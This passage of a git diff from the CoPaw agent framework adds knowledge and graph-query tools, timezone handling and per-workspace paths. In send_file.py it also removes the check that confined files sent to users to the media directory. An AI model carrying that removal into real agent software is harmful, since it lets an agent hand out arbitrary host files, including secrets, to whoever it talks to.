@@ -785,7 +832,7 @@ def delete_skill(name: str) -> bool: Returns: True if skill was deleted successfully, False otherwise. """ - customized_dir = get_customized_skills_dir() + customized_dir = get_customized_skills_dir(self.workspace_dir) skill_dir = customized_dir / name if not skill_dir.exists(): @@ -810,8 +857,8 @@ def delete_skill(name: str) -> bool: ) return False - @staticmethod def sync_from_active_to_customized( + self, skill_names: list[str] | None = None, ) -> tuple[int, int]: """ @@ -824,11 +871,12 @@ def sync_from_active_to_customized( Tuple of (synced_count, skipped_count). """ return sync_skills_from_active_to_customized( + self.workspace_dir, skill_names=skill_names, ) - @staticmethod def load_skill_file( # pylint: disable=too-many-return-statements + self, skill_name: str, file_path: str, source: str, @@ -892,7 +940,7 @@ def load_skill_file( # pylint: disable=too-many-return-statements # Get source directory if source == "customized": - base_dir = get_customized_skills_dir() + base_dir = get_customized_skills_dir(self.workspace_dir) else: # builtin base_dir = get_builtin_skills_dir() diff --git a/src/copaw/agents/tool_guard_mixin.py b/src/copaw/agents/tool_guard_mixin.py index 472d000ca..5053bc573 100644 --- a/src/copaw/agents/tool_guard_mixin.py +++ b/src/copaw/agents/tool_guard_mixin.py @@ -343,9 +343,6 @@ async def _reasoning( await self.memory.add(msg) return msg - if tool_choice is None and self.toolkit.get_json_schemas(): - tool_choice = "auto" - return await super()._reasoning( # type: ignore[misc] tool_choice=tool_choice, ) diff --git a/src/copaw/agents/tools/__init__.py b/src/copaw/agents/tools/__init__.py index 70b32c6da..d9c717e6e 100644 --- a/src/copaw/agents/tools/__init__.py +++ b/src/copaw/agents/tools/__init__.py @@ -19,9 +19,15 @@ from .send_file import send_file_to_user from .browser_control import browser_use from .desktop_screenshot import desktop_screenshot +from .view_image import view_image from .memory_search import 
create_memory_search_tool -from .get_current_time import get_current_time +from .get_current_time import get_current_time, set_user_timezone from .get_token_usage import get_token_usage +from .knowledge_search import knowledge_search +from .graph_query import graph_query +from .memify_run import memify_run +from .memify_status import memify_status +from .triplet_focus_search import triplet_focus_search __all__ = [ "execute_python_code", @@ -36,8 +42,15 @@ "glob_search", "send_file_to_user", "desktop_screenshot", + "view_image", "browser_use", "create_memory_search_tool", "get_current_time", + "set_user_timezone", "get_token_usage", + "knowledge_search", + "graph_query", + "memify_run", + "memify_status", + "triplet_focus_search", ] diff --git a/src/copaw/agents/tools/browser_control.py b/src/copaw/agents/tools/browser_control.py index 2ee73d7d7..25e29ef55 100644 --- a/src/copaw/agents/tools/browser_control.py +++ b/src/copaw/agents/tools/browser_control.py @@ -11,13 +11,13 @@ import asyncio import atexit +from concurrent import futures import json import logging import os import subprocess import sys import time -from concurrent.futures import ThreadPoolExecutor from typing import Any, Optional from agentscope.message import TextBlock @@ -41,12 +41,12 @@ ) if _USE_SYNC_PLAYWRIGHT: - _executor: Optional[ThreadPoolExecutor] = None + _executor: Optional[futures.ThreadPoolExecutor] = None - def _get_executor() -> ThreadPoolExecutor: + def _get_executor() -> futures.ThreadPoolExecutor: global _executor if _executor is None: - _executor = ThreadPoolExecutor( + _executor = futures.ThreadPoolExecutor( max_workers=1, thread_name_prefix="playwright", ) diff --git a/src/copaw/agents/tools/file_io.py b/src/copaw/agents/tools/file_io.py index 1e8040412..237d38ad3 100644 --- a/src/copaw/agents/tools/file_io.py +++ b/src/copaw/agents/tools/file_io.py @@ -9,12 +9,13 @@ from agentscope.tool import ToolResponse from ...constant import WORKING_DIR +from ...config.context import 
get_current_workspace_dir from .utils import truncate_file_output, read_file_safe def _resolve_file_path(file_path: str) -> str: """Resolve file path: use absolute path as-is, - resolve relative path from WORKING_DIR. + resolve relative path from current workspace or WORKING_DIR. Args: file_path: The input file path (absolute or relative). @@ -26,7 +27,9 @@ def _resolve_file_path(file_path: str) -> str: if path.is_absolute(): return str(path) else: - return str(WORKING_DIR / file_path) + # Use current workspace_dir from context, fallback to WORKING_DIR + workspace_dir = get_current_workspace_dir() or WORKING_DIR + return str(workspace_dir / file_path) async def read_file( # pylint: disable=too-many-return-statements diff --git a/src/copaw/agents/tools/file_search.py b/src/copaw/agents/tools/file_search.py index 12bcdae0d..330c5a722 100644 --- a/src/copaw/agents/tools/file_search.py +++ b/src/copaw/agents/tools/file_search.py @@ -11,6 +11,7 @@ from agentscope.tool import ToolResponse from ...constant import WORKING_DIR +from ...config.context import get_current_workspace_dir from .file_io import _resolve_file_path # Skip binary / large files @@ -112,7 +113,11 @@ async def grep_search( # pylint: disable=too-many-branches ], ) - search_root = Path(_resolve_file_path(path)) if path else WORKING_DIR + search_root = ( + Path(_resolve_file_path(path)) + if path + else (get_current_workspace_dir() or WORKING_DIR) + ) if not search_root.exists(): return ToolResponse( @@ -236,7 +241,11 @@ async def glob_search( ], ) - search_root = Path(_resolve_file_path(path)) if path else WORKING_DIR + search_root = ( + Path(_resolve_file_path(path)) + if path + else (get_current_workspace_dir() or WORKING_DIR) + ) if not search_root.exists(): return ToolResponse( diff --git a/src/copaw/agents/tools/get_current_time.py b/src/copaw/agents/tools/get_current_time.py index 5bd25be6b..d815681ff 100644 --- a/src/copaw/agents/tools/get_current_time.py +++ 
b/src/copaw/agents/tools/get_current_time.py @@ -1,25 +1,39 @@ # -*- coding: utf-8 -*- -"""Tool that returns the current UTC time.""" +"""Tools for getting and setting the user timezone.""" +import logging from datetime import datetime, timezone +from zoneinfo import ZoneInfo, ZoneInfoNotFoundError from agentscope.message import TextBlock from agentscope.tool import ToolResponse +from ...config import load_config, save_config + +logger = logging.getLogger(__name__) -async def get_current_time() -> ToolResponse: - """Get the current UTC time. - Returns the current time in UTC in a human-readable format. - Useful for time-sensitive tasks such as scheduling cron jobs. +async def get_current_time() -> ToolResponse: + """Get the current time. + Only call this tool when the user explicitly asks for the time. Returns: `ToolResponse`: - The current UTC time string, - e.g. "2026-02-13 11:30:45 UTC (Friday)". + The current time string, + e.g. "2026-02-13 19:30:45 Asia/Shanghai (Friday)". """ - now = datetime.now(timezone.utc) - time_str = now.strftime("%Y-%m-%d %H:%M:%S UTC (%A)") + user_tz = load_config().user_timezone or "UTC" + try: + now = datetime.now(ZoneInfo(user_tz)) + except (ZoneInfoNotFoundError, KeyError): + logger.warning("Invalid timezone %r, falling back to UTC", user_tz) + now = datetime.now(timezone.utc) + user_tz = "UTC" + + time_str = ( + f"{now.strftime('%Y-%m-%d %H:%M:%S')} " + f"{user_tz} ({now.strftime('%A')})" + ) return ToolResponse( content=[ @@ -29,3 +43,50 @@ async def get_current_time() -> ToolResponse: ), ], ) + + +async def set_user_timezone(timezone_name: str) -> ToolResponse: + """Set the user timezone. + Only call this tool when the user explicitly asks to change their timezone. + + Args: + timezone_name: IANA timezone name (e.g. "Asia/Shanghai", + "America/New_York", "Europe/London", "UTC"). + + Returns: + `ToolResponse`: Confirmation with the new timezone and current time. 
+ """ + tz_name = timezone_name.strip() + if not tz_name: + return ToolResponse( + content=[TextBlock(type="text", text="Error: timezone is empty.")], + ) + + try: + now = datetime.now(ZoneInfo(tz_name)) + except (ZoneInfoNotFoundError, KeyError): + return ToolResponse( + content=[ + TextBlock( + type="text", + text=f"Error: invalid timezone '{tz_name}'.", + ), + ], + ) + + config = load_config() + config.user_timezone = tz_name + save_config(config) + + time_str = ( + f"{now.strftime('%Y-%m-%d %H:%M:%S')} " + f"{tz_name} ({now.strftime('%A')})" + ) + return ToolResponse( + content=[ + TextBlock( + type="text", + text=f"Timezone set to {tz_name}. Current time: {time_str}", + ), + ], + ) diff --git a/src/copaw/agents/tools/graph_query.py b/src/copaw/agents/tools/graph_query.py new file mode 100644 index 000000000..0b8ac3d1e --- /dev/null +++ b/src/copaw/agents/tools/graph_query.py @@ -0,0 +1,97 @@ +# -*- coding: utf-8 -*- +"""Tool to execute graph-oriented knowledge queries.""" + +from __future__ import annotations + +import json + +from agentscope.message import TextBlock +from agentscope.tool import ToolResponse + +from ...config import load_config +from ...constant import WORKING_DIR +from ...knowledge.graph_ops import GraphOpsManager + + +async def graph_query( + query_text: str, + query_mode: str = "template", + dataset_scope: list[str] | None = None, + top_k: int = 10, + timeout_sec: int = 20, +) -> ToolResponse: + """Run graph-style query and return normalized records. + + Args: + query_text: Text query or cypher query body. + query_mode: One of "template" or "cypher". + dataset_scope: Optional dataset names/ids for scoping. + top_k: Maximum number of records to return. + timeout_sec: Query timeout for backend provider. 
+    """
+    text = (query_text or "").strip()
+    if not text:
+        return ToolResponse(
+            content=[TextBlock(type="text", text="Error: query_text cannot be empty.")],
+        )
+
+    mode = (query_mode or "template").strip().lower()
+    if mode not in {"template", "cypher"}:
+        return ToolResponse(
+            content=[
+                TextBlock(
+                    type="text",
+                    text="Error: query_mode must be 'template' or 'cypher'.",
+                )
+            ],
+        )
+
+    config = load_config()
+    if not getattr(config, "knowledge", None) or not config.knowledge.enabled:
+        return ToolResponse(
+            content=[
+                TextBlock(type="text", text="Error: knowledge is disabled in configuration."),
+            ],
+        )
+    if not bool(getattr(config.agents.running, "knowledge_enabled", True)):
+        return ToolResponse(
+            content=[
+                TextBlock(type="text", text="Error: knowledge is disabled in agent runtime configuration."),
+            ],
+        )
+    if not bool(getattr(config.knowledge, "graph_query_enabled", False)):
+        return ToolResponse(
+            content=[
+                TextBlock(type="text", text="Error: graph query is disabled in configuration."),
+            ],
+        )
+    if mode == "cypher" and not bool(getattr(config.knowledge, "allow_cypher_query", False)):
+        return ToolResponse(
+            content=[
+                TextBlock(type="text", text="Error: cypher query is not allowed by configuration."),
+            ],
+        )
+
+    try:
+        manager = GraphOpsManager(WORKING_DIR)
+        result = manager.graph_query(
+            config=config.knowledge,
+            query_mode=mode,
+            query_text=text,
+            dataset_scope=dataset_scope,
+            top_k=max(1, min(int(top_k), 50)),
+            timeout_sec=max(1, min(int(timeout_sec), 120)),
+        )
+        payload = {
+            "records": result.records,
+            "summary": result.summary,
+            "provenance": result.provenance,
+            "warnings": result.warnings,
+        }
+        return ToolResponse(
+            content=[TextBlock(type="text", text=json.dumps(payload, ensure_ascii=False, indent=2))],
+        )
+    except Exception as e:
+        return ToolResponse(
+            content=[TextBlock(type="text", text=f"Error: graph query failed due to\n{e}")],
+        )
\ No newline at end of file
diff --git a/src/copaw/agents/tools/knowledge_search.py b/src/copaw/agents/tools/knowledge_search.py
new file mode 100644
index 000000000..4288eb86d
--- /dev/null
+++ b/src/copaw/agents/tools/knowledge_search.py
@@ -0,0 +1,135 @@
+# -*- coding: utf-8 -*-
+"""Tool to search indexed knowledge chunks."""
+
+from agentscope.message import TextBlock
+from agentscope.tool import ToolResponse
+
+from ...config import load_config
+from ...constant import WORKING_DIR
+from ...knowledge import KnowledgeManager
+
+
+async def knowledge_search(
+    query: str,
+    max_results: int = 5,
+    min_score: float = 1.0,
+    source_types: list[str] | None = None,
+) -> ToolResponse:
+    """Search knowledge sources and return the top matched snippets.
+
+    Use this tool when you need project-specific facts from indexed
+    knowledge sources instead of guessing from memory.
+
+    Args:
+        query: Search query text.
+        max_results: Maximum number of hits to return.
+        min_score: Minimum lexical score required for a hit.
+        source_types: Optional source type filter, e.g. ["file", "url"].
+
+    Returns:
+        ToolResponse with formatted hit summaries.
+    """
+    query_text = (query or "").strip()
+    if not query_text:
+        return ToolResponse(
+            content=[
+                TextBlock(
+                    type="text",
+                    text="Error: query cannot be empty.",
+                ),
+            ],
+        )
+
+    try:
+        config = load_config()
+        if not getattr(config, "knowledge", None) or not config.knowledge.enabled:
+            return ToolResponse(
+                content=[
+                    TextBlock(
+                        type="text",
+                        text="Knowledge is disabled in configuration.",
+                    ),
+                ],
+            )
+        if not bool(getattr(config.agents.running, "knowledge_enabled", True)):
+            return ToolResponse(
+                content=[
+                    TextBlock(
+                        type="text",
+                        text="Knowledge is disabled in agent runtime configuration.",
+                    ),
+                ],
+            )
+        if not bool(
+            getattr(
+                getattr(config, "agents", None),
+                "running",
+                None,
+            )
+            and getattr(config.agents.running, "knowledge_retrieval_enabled", True)
+        ):
+            return ToolResponse(
+                content=[
+                    TextBlock(
+                        type="text",
+                        text="Knowledge retrieval is disabled in agent runtime configuration.",
+                    ),
+                ],
+            )
+
+        limit = max(1, min(int(max_results), 20))
+        threshold = float(min_score)
+        manager = KnowledgeManager(WORKING_DIR)
+        result = manager.search(
+            query=query_text,
+            config=config.knowledge,
+            limit=limit,
+            source_types=source_types,
+        )
+        hits = [
+            hit
+            for hit in (result.get("hits") or [])
+            if float(hit.get("score", 0) or 0) >= threshold
+        ]
+
+        if not hits:
+            return ToolResponse(
+                content=[
+                    TextBlock(
+                        type="text",
+                        text="No relevant knowledge found.",
+                    ),
+                ],
+            )
+
+        lines: list[str] = [f"Knowledge search results for: {query_text}", ""]
+        for index, hit in enumerate(hits, start=1):
+            source_name = hit.get("source_name") or "unknown"
+            source_type = hit.get("source_type") or "unknown"
+            score = float(hit.get("score", 0) or 0)
+            title = hit.get("document_title") or "(untitled)"
+            path = hit.get("document_path") or ""
+            snippet = (hit.get("snippet") or "").strip()
+
+            lines.append(
+                f"[{index}] {source_name} ({source_type}) score={score:.2f}",
+            )
+            lines.append(f"title: {title}")
+            if path:
+                lines.append(f"path: {path}")
+            if snippet:
+                lines.append(f"snippet: {snippet}")
+            lines.append("")
+
+        return ToolResponse(
+            content=[TextBlock(type="text", text="\n".join(lines).strip())],
+        )
+    except Exception as e:
+        return ToolResponse(
+            content=[
+                TextBlock(
+                    type="text",
+                    text=f"Error: knowledge search failed due to\n{e}",
+                ),
+            ],
+        )
diff --git a/src/copaw/agents/tools/memify_run.py b/src/copaw/agents/tools/memify_run.py
new file mode 100644
index 000000000..7f4a4d86b
--- /dev/null
+++ b/src/copaw/agents/tools/memify_run.py
@@ -0,0 +1,78 @@
+# -*- coding: utf-8 -*-
+"""Tool to trigger memify enrichment jobs."""
+
+from __future__ import annotations
+
+import json
+
+from agentscope.message import TextBlock
+from agentscope.tool import ToolResponse
+
+from ...config import load_config
+from ...constant import WORKING_DIR
+from ...knowledge.graph_ops import GraphOpsManager
+
+_PIPELINE_WHITELIST = {
+    "default",
+    "coding_rules",
+    "triplet_embeddings",
+    "session_persistence",
+    "entity_consolidation",
+}
+
+
+async def memify_run(
+    pipeline_type: str = "default",
+    dataset_scope: list[str] | None = None,
+    idempotency_key: str = "",
+    dry_run: bool = False,
+) -> ToolResponse:
+    """Trigger a memify enrichment job.
+
+    Args:
+        pipeline_type: Pipeline type, defaults to "default".
+        dataset_scope: Optional dataset names/ids.
+        idempotency_key: Optional key to deduplicate repeated requests.
+        dry_run: Whether to run in dry-run mode.
+    """
+    config = load_config()
+    if not getattr(config, "knowledge", None) or not config.knowledge.enabled:
+        return ToolResponse(
+            content=[TextBlock(type="text", text="Error: knowledge is disabled in configuration.")],
+        )
+    if not bool(getattr(config.agents.running, "knowledge_enabled", True)):
+        return ToolResponse(
+            content=[TextBlock(type="text", text="Error: knowledge is disabled in agent runtime configuration.")],
+        )
+    if not bool(getattr(config.knowledge, "memify_enabled", False)):
+        return ToolResponse(
+            content=[TextBlock(type="text", text="Error: memify is disabled in configuration.")],
+        )
+
+    pipeline = (pipeline_type or "default").strip().lower()
+    if pipeline not in _PIPELINE_WHITELIST:
+        return ToolResponse(
+            content=[
+                TextBlock(
+                    type="text",
+                    text="Error: pipeline_type is invalid or not allowed.",
+                )
+            ],
+        )
+
+    try:
+        manager = GraphOpsManager(WORKING_DIR)
+        result = manager.run_memify(
+            config=config.knowledge,
+            pipeline_type=pipeline,
+            dataset_scope=dataset_scope,
+            idempotency_key=(idempotency_key or "").strip(),
+            dry_run=bool(dry_run),
+        )
+        return ToolResponse(
+            content=[TextBlock(type="text", text=json.dumps(result, ensure_ascii=False, indent=2))],
+        )
+    except Exception as e:
+        return ToolResponse(
+            content=[TextBlock(type="text", text=f"Error: memify run failed due to\n{e}")],
+        )
\ No newline at end of file
diff --git a/src/copaw/agents/tools/memify_status.py b/src/copaw/agents/tools/memify_status.py
new file mode 100644
index 000000000..77e0b9ec6
--- /dev/null
+++ b/src/copaw/agents/tools/memify_status.py
@@ -0,0 +1,51 @@
+# -*- coding: utf-8 -*-
+"""Tool to query memify enrichment job status."""
+
+from __future__ import annotations
+
+import json
+
+from agentscope.message import TextBlock
+from agentscope.tool import ToolResponse
+
+from ...config import load_config
+from ...constant import WORKING_DIR
+from ...knowledge.graph_ops import GraphOpsManager
+
+
+async def memify_status(job_id: str) -> ToolResponse:
+    """Get memify job status by job id."""
+    normalized_job_id = (job_id or "").strip()
+    if not normalized_job_id:
+        return ToolResponse(
+            content=[TextBlock(type="text", text="Error: job_id cannot be empty.")],
+        )
+
+    config = load_config()
+    if not getattr(config, "knowledge", None) or not config.knowledge.enabled:
+        return ToolResponse(
+            content=[TextBlock(type="text", text="Error: knowledge is disabled in configuration.")],
+        )
+    if not bool(getattr(config.agents.running, "knowledge_enabled", True)):
+        return ToolResponse(
+            content=[TextBlock(type="text", text="Error: knowledge is disabled in agent runtime configuration.")],
+        )
+    if not bool(getattr(config.knowledge, "memify_enabled", False)):
+        return ToolResponse(
+            content=[TextBlock(type="text", text="Error: memify is disabled in configuration.")],
+        )
+
+    try:
+        manager = GraphOpsManager(WORKING_DIR)
+        result = manager.get_memify_status(normalized_job_id)
+        if result is None:
+            return ToolResponse(
+                content=[TextBlock(type="text", text="Error: memify job not found.")],
+            )
+        return ToolResponse(
+            content=[TextBlock(type="text", text=json.dumps(result, ensure_ascii=False, indent=2))],
+        )
+    except Exception as e:
+        return ToolResponse(
+            content=[TextBlock(type="text", text=f"Error: memify status failed due to\n{e}")],
+        )
\ No newline at end of file
diff --git a/src/copaw/agents/tools/send_file.py b/src/copaw/agents/tools/send_file.py
index c6fb13773..e48a8b52a 100644
--- a/src/copaw/agents/tools/send_file.py
+++ b/src/copaw/agents/tools/send_file.py
@@ -4,7 +4,6 @@
 import os
 import mimetypes
 import unicodedata
-from pathlib import Path
 
 from agentscope.tool import ToolResponse
 from agentscope.message import (
@@ -15,24 +14,6 @@
 )
 
 from ..schema import FileBlock
-from ...constant import WORKING_DIR
-
-# Only allow files under this directory, mirroring message_processing.py
-_ALLOWED_MEDIA_ROOT = WORKING_DIR / "media"
-
-
-def _is_allowed_media_path(path: str) -> bool:
-    """True if path is a file under _ALLOWED_MEDIA_ROOT.
-
-    Returns False when the path is invalid, cannot be resolved,
-    is not a regular file, or lies outside the allowed media root.
-    """
-    try:
-        resolved = Path(path).expanduser().resolve()
-        root = _ALLOWED_MEDIA_ROOT.resolve()
-        return resolved.is_file() and resolved.is_relative_to(root)
-    except Exception:
-        return False
 
 
 def _auto_as_type(mt: str) -> str:
@@ -50,13 +31,9 @@
 ) -> ToolResponse:
     """Send a file to the user.
 
-    The file must be located inside the allowed media directory
-    (``/media``). Attempting to send a file from outside that
-    directory will return an error so that the agent is aware of the failure.
-
     Args:
         file_path (`str`):
-            Path to the file to send. Must be inside the media directory.
+            Path to the file to send.
 
     Returns:
         `ToolResponse`:
@@ -98,17 +75,6 @@
     try:
         # Use local file URL instead of base64
         absolute_path = os.path.abspath(file_path)
-
-        if not _is_allowed_media_path(absolute_path):
-            return ToolResponse(
-                content=[
-                    TextBlock(
-                        type="text",
-                        text=f"Error: Media file outside allowed directory: {os.path.basename(file_path)}",
-                    ),
-                ],
-            )
-
         file_url = f"file://{absolute_path}"
         source = {"type": "url", "url": file_url}
diff --git a/src/copaw/agents/tools/shell.py b/src/copaw/agents/tools/shell.py
index dc1a4f111..aca24b719 100644
--- a/src/copaw/agents/tools/shell.py
+++ b/src/copaw/agents/tools/shell.py
@@ -14,7 +14,8 @@
 from agentscope.message import TextBlock
 from agentscope.tool import ToolResponse
 
-from copaw.constant import WORKING_DIR
+from ...constant import WORKING_DIR
+from ...config.context import get_current_workspace_dir
 
 from .utils import truncate_shell_output
@@ -68,9 +69,14 @@
         return code will be -1 and stderr will contain timeout information.
     """
     try:
+        # Disable cmd.exe AutoRun (/D) to prevent spurious stderr
+        # from registry-configured startup scripts (e.g. "The system
+        # cannot find the path specified."). /S prevents quote stripping
+        # so the inner command is passed through unchanged.
+        wrapped = ["cmd", "/D", "/S", "/C", cmd]
         with subprocess.Popen(
-            cmd,
-            shell=True,
+            wrapped,
+            shell=False,
             stdout=subprocess.PIPE,
             stderr=subprocess.PIPE,
             text=False,
@@ -131,6 +137,8 @@
     error within , and tags.
 
+    IMPORTANT: Always consider the operating system before choosing commands.
+
     Args:
         command (`str`):
             The shell command to execute.
@@ -151,7 +159,11 @@
     cmd = (command or "").strip()
 
     # Set working directory
-    working_dir = cwd if cwd is not None else WORKING_DIR
+    # Use current workspace_dir from context, fallback to WORKING_DIR
+    if cwd is not None:
+        working_dir = cwd
+    else:
+        working_dir = get_current_workspace_dir() or WORKING_DIR
 
     # Ensure the venv Python is on PATH for subprocesses
     env = os.environ.copy()
diff --git a/src/copaw/agents/tools/triplet_focus_search.py b/src/copaw/agents/tools/triplet_focus_search.py
new file mode 100644
index 000000000..4f17a1cc3
--- /dev/null
+++ b/src/copaw/agents/tools/triplet_focus_search.py
@@ -0,0 +1,119 @@
+# -*- coding: utf-8 -*-
+"""Tool for triplet-focused graph retrieval."""
+
+from __future__ import annotations
+
+import json
+
+from agentscope.message import TextBlock
+from agentscope.tool import ToolResponse
+
+from ...config import load_config
+from ...constant import WORKING_DIR
+from ...knowledge.graph_ops import GraphOpsManager
+
+
+async def triplet_focus_search(
+    subject: str = "",
+    predicate: str = "",
+    object_text: str = "",
+    query_text: str = "",
+    dataset_scope: list[str] | None = None,
+    top_k: int = 10,
+    expand_hops: int = 1,
+) -> ToolResponse:
+    """Search graph records and return triplet-focused structured payload."""
+    s = (subject or "").strip()
+    p = (predicate or "").strip()
+    o = (object_text or "").strip()
+    q = (query_text or "").strip()
+
+    if not any([s, p, o, q]):
+        return ToolResponse(
+            content=[
+                TextBlock(
+                    type="text",
+                    text="Error: at least one of subject/predicate/object_text/query_text is required.",
+                )
+            ],
+        )
+
+    config = load_config()
+    if not getattr(config, "knowledge", None) or not config.knowledge.enabled:
+        return ToolResponse(
+            content=[TextBlock(type="text", text="Error: knowledge is disabled in configuration.")],
+        )
+    if not bool(getattr(config.agents.running, "knowledge_enabled", True)):
+        return ToolResponse(
+            content=[TextBlock(type="text", text="Error: knowledge is disabled in agent runtime configuration.")],
+        )
+    if not bool(getattr(config.knowledge, "triplet_search_enabled", False)):
+        return ToolResponse(
+            content=[
+                TextBlock(
+                    type="text",
+                    text="Error: triplet-focused search is disabled in configuration.",
+                )
+            ],
+        )
+
+    effective_query = q or " ".join(item for item in [s, p, o] if item)
+    try:
+        manager = GraphOpsManager(WORKING_DIR)
+        base = manager.graph_query(
+            config=config.knowledge,
+            query_mode="template",
+            query_text=effective_query,
+            dataset_scope=dataset_scope,
+            top_k=max(1, min(int(top_k), 50)),
+            timeout_sec=20,
+        )
+
+        filtered_records: list[dict] = []
+        for record in base.records:
+            rs = str(record.get("subject") or "")
+            rp = str(record.get("predicate") or "")
+            ro = str(record.get("object") or "")
+            if s and s.lower() not in rs.lower():
+                continue
+            if p and p.lower() not in rp.lower():
+                continue
+            if o and o.lower() not in ro.lower():
+                continue
+            filtered_records.append(record)
+
+        triplets = [
+            {
+                "subject": item.get("subject"),
+                "predicate": item.get("predicate"),
+                "object": item.get("object"),
+            }
+            for item in filtered_records
+        ]
+        evidence = [
+            {
+                "source_id": item.get("source_id"),
+                "source_type": item.get("source_type"),
+                "document_path": item.get("document_path"),
+                "document_title": item.get("document_title"),
+            }
+            for item in filtered_records
+        ]
+        scores = [float(item.get("score", 0) or 0) for item in filtered_records]
+
+        payload = {
+            "triplets": triplets,
+            "evidence": evidence,
+            "scores": scores,
+            "context_summary": (
+                f"Found {len(triplets)} triplets (expand_hops={max(1, int(expand_hops))})."
+            ),
+            "warnings": base.warnings,
+        }
+        return ToolResponse(
+            content=[TextBlock(type="text", text=json.dumps(payload, ensure_ascii=False, indent=2))],
+        )
+    except Exception as e:
+        return ToolResponse(
+            content=[TextBlock(type="text", text=f"Error: triplet-focused search failed due to\n{e}")],
+        )
\ No newline at end of file
diff --git a/src/copaw/agents/tools/view_image.py b/src/copaw/agents/tools/view_image.py
new file mode 100644
index 000000000..577765231
--- /dev/null
+++ b/src/copaw/agents/tools/view_image.py
@@ -0,0 +1,81 @@
+# -*- coding: utf-8 -*-
+"""Load an image file into the LLM context for visual analysis."""
+
+import mimetypes
+import os
+import unicodedata
+from pathlib import Path
+
+from agentscope.message import ImageBlock, TextBlock
+from agentscope.tool import ToolResponse
+
+_IMAGE_EXTENSIONS = {
+    ".png",
+    ".jpg",
+    ".jpeg",
+    ".gif",
+    ".webp",
+    ".bmp",
+    ".tiff",
+    ".tif",
+}
+
+
+async def view_image(image_path: str) -> ToolResponse:
+    """Load an image file into the LLM context so the model can see it.
+
+    Use this after desktop_screenshot, browser_use, or any tool that
+    produces an image file path.
+
+    Args:
+        image_path (`str`):
+            Path to the image file to view.
+
+    Returns:
+        `ToolResponse`:
+            An ImageBlock the model can inspect, or an error message.
+    """
+    image_path = unicodedata.normalize(
+        "NFC",
+        os.path.expanduser(image_path),
+    )
+    resolved = Path(image_path).resolve()
+
+    if not resolved.exists() or not resolved.is_file():
+        return ToolResponse(
+            content=[
+                TextBlock(
+                    type="text",
+                    text=f"Error: {image_path} does not exist or "
+                    "is not a file.",
+                ),
+            ],
+        )
+
+    ext = resolved.suffix.lower()
+    mime, _ = mimetypes.guess_type(str(resolved))
+    if ext not in _IMAGE_EXTENSIONS and (
+        not mime or not mime.startswith("image/")
+    ):
+        return ToolResponse(
+            content=[
+                TextBlock(
+                    type="text",
+                    text=f"Error: {resolved.name} is not a supported "
+                    "image format.",
+                ),
+            ],
+        )
+
+    return ToolResponse(
+        content=[
+            ImageBlock(
+                type="image",
+                source={"type": "url", "url": str(resolved)},
+            ),
+            TextBlock(
+                type="text",
+                text=f"Image loaded: {resolved.name}",
+            ),
+        ],
+    )
diff --git a/src/copaw/agents/utils/__init__.py b/src/copaw/agents/utils/__init__.py
index 2a983500c..b82ab64e6 100644
--- a/src/copaw/agents/utils/__init__.py
+++ b/src/copaw/agents/utils/__init__.py
@@ -44,6 +44,8 @@
     extract_tool_ids,
 )
 
+from .copaw_token_counter import _get_copaw_token_counter
+
 __all__ = [
     # File handling
     "download_file_from_base64",
@@ -66,4 +68,5 @@
     "_sanitize_tool_messages",
     "check_valid_messages",
     "extract_tool_ids",
+    "_get_copaw_token_counter",
 ]
diff --git a/src/copaw/agents/utils/audio_transcription.py b/src/copaw/agents/utils/audio_transcription.py
new file mode 100644
index 000000000..5ecdf8673
--- /dev/null
+++ b/src/copaw/agents/utils/audio_transcription.py
@@ -0,0 +1,317 @@
+# -*- coding: utf-8 -*-
+"""Audio transcription utility.
+
+Transcribes audio files to text using either:
+- An OpenAI-compatible ``/v1/audio/transcriptions`` endpoint (Whisper API), or
+- The locally installed ``openai-whisper`` Python library (Local Whisper).
+
+Transcription is only attempted when explicitly enabled via the
+``transcription_provider_type`` config setting. The default is ``"disabled"``.
+"""
+
+import asyncio
+import logging
+import shutil
+import threading
+from typing import List, Optional, Tuple
+
+logger = logging.getLogger(__name__)
+
+# ------------------------------------------------------------------
+# Cached local-whisper model (lazy singleton)
+# ------------------------------------------------------------------
+_local_whisper_model = None
+_local_whisper_lock = threading.Lock()
+
+
+def _get_local_whisper_model():
+    """Return a cached whisper model, loading it on first call."""
+    global _local_whisper_model  # noqa: PLW0603
+    if _local_whisper_model is not None:
+        return _local_whisper_model
+    with _local_whisper_lock:
+        if _local_whisper_model is not None:
+            return _local_whisper_model
+        import whisper
+
+        _local_whisper_model = whisper.load_model("base")
+        return _local_whisper_model
+
+
+# ------------------------------------------------------------------
+# Provider helpers
+# ------------------------------------------------------------------
+
+
+def _url_for_provider(provider) -> Optional[Tuple[str, str]]:
+    """Return ``(base_url, api_key)`` if *provider* can serve transcription.
+
+    Supports providers that do not require an API key (e.g. local Ollama).
+    """
+    from ...providers.openai_provider import OpenAIProvider
+    from ...providers.ollama_provider import OllamaProvider
+
+    if isinstance(provider, OpenAIProvider):
+        requires_key = getattr(provider, "require_api_key", True)
+        key = provider.api_key or ""
+        if requires_key and not key:
+            return None
+        base = provider.base_url.rstrip("/")
+        if not base.endswith("/v1"):
+            base += "/v1"
+        return (base, key or "")
+    if isinstance(provider, OllamaProvider):
+        base = provider.base_url.rstrip("/")
+        if not base.endswith("/v1"):
+            base += "/v1"
+        return (base, provider.api_key or "")
+    return None
+
+
+def _get_manager():
+    """Return ProviderManager singleton or None."""
+    try:
+        from ...providers.provider_manager import ProviderManager
+
+        return ProviderManager.get_instance()
+    except Exception:
+        logger.debug("ProviderManager not initialised yet")
+        return None
+
+
+# ------------------------------------------------------------------
+# Public helpers for API / Console UI
+# ------------------------------------------------------------------
+
+
+def list_transcription_providers() -> List[dict]:
+    """Return providers capable of audio transcription.
+
+    Each entry is ``{"id": ..., "name": ..., "available": bool}``.
+    Availability is based on whether the provider has usable credentials.
+    """
+    manager = _get_manager()
+    if manager is None:
+        return []
+
+    results: list[dict] = []
+    all_providers = {
+        **getattr(manager, "builtin_providers", {}),
+        **getattr(manager, "custom_providers", {}),
+    }
+    for provider in all_providers.values():
+        creds = _url_for_provider(provider)
+        if creds is not None:
+            results.append(
+                {
+                    "id": provider.id,
+                    "name": provider.name,
+                    "available": True,
+                },
+            )
+    return results
+
+
+def get_configured_transcription_provider_id() -> str:
+    """Return the explicitly configured provider ID (raw config value)."""
+    from ...config import load_config
+
+    return load_config().agents.transcription_provider_id
+
+
+def check_local_whisper_available() -> dict:
+    """Check whether the local whisper provider can be used.
+
+    Returns a dict with::
+
+        {
+            "available": bool,
+            "ffmpeg_installed": bool,
+            "whisper_installed": bool,
+        }
+    """
+    ffmpeg_ok = shutil.which("ffmpeg") is not None
+
+    whisper_ok = False
+    try:
